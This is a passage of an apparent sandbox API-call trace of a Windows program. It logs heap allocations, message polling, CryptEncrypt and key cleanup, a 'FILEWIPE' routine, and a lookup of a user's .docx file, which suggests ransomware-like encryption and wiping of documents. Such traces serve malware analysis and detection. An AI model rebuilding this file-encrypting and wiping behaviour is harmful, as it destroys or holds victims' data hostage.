0xb [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.086] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.087] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.087] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.087] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0037.088] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0037.088] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x946968*, pdwDataLen=0x6ae220*=0x11955, dwBufLen=0x11960 | out: pbData=0x946968*, pdwDataLen=0x6ae220*=0x11960) returned 1 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0037.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.089] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.089] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.090] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.090] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.090] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.090] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.090] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.090] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.090] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.090] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.090] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.094] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.094] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.094] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.097] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.097] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.097] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.097] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.097] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.097] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.097] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.097] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0037.098] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.098] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.098] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.098] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.098] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.098] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.098] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.098] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.098] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.098] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.098] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.098] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.098] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.098] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.098] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.099] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.099] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.099] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.099] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.099] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.099] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.099] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.099] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0037.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.099] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.099] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.099] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.099] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.100] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.100] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be5b000, ftCreationTime.dwHighDateTime=0x1d55664, ftLastAccessTime.dwLowDateTime=0x68a94680, ftLastAccessTime.dwHighDateTime=0x1d5b5e5, ftLastWriteTime.dwLowDateTime=0x68a94680, ftLastWriteTime.dwHighDateTime=0x1d5b5e5, nFileSizeHigh=0x0, nFileSizeLow=0x11955, dwReserved0=0x0, dwReserved1=0x777648, cFileName="_H6YZ.docx", cAlternateFileName="_H6YZ~1.DOC")) returned 0x7c2100 [0037.100] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.100] CharLowerBuffW (in: lpsz="byte[72021]", cchLength=0xb | out: lpsz="byte[72021]") returned 0xb [0037.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.100] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.101] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.101] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.101] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.102] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.102] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 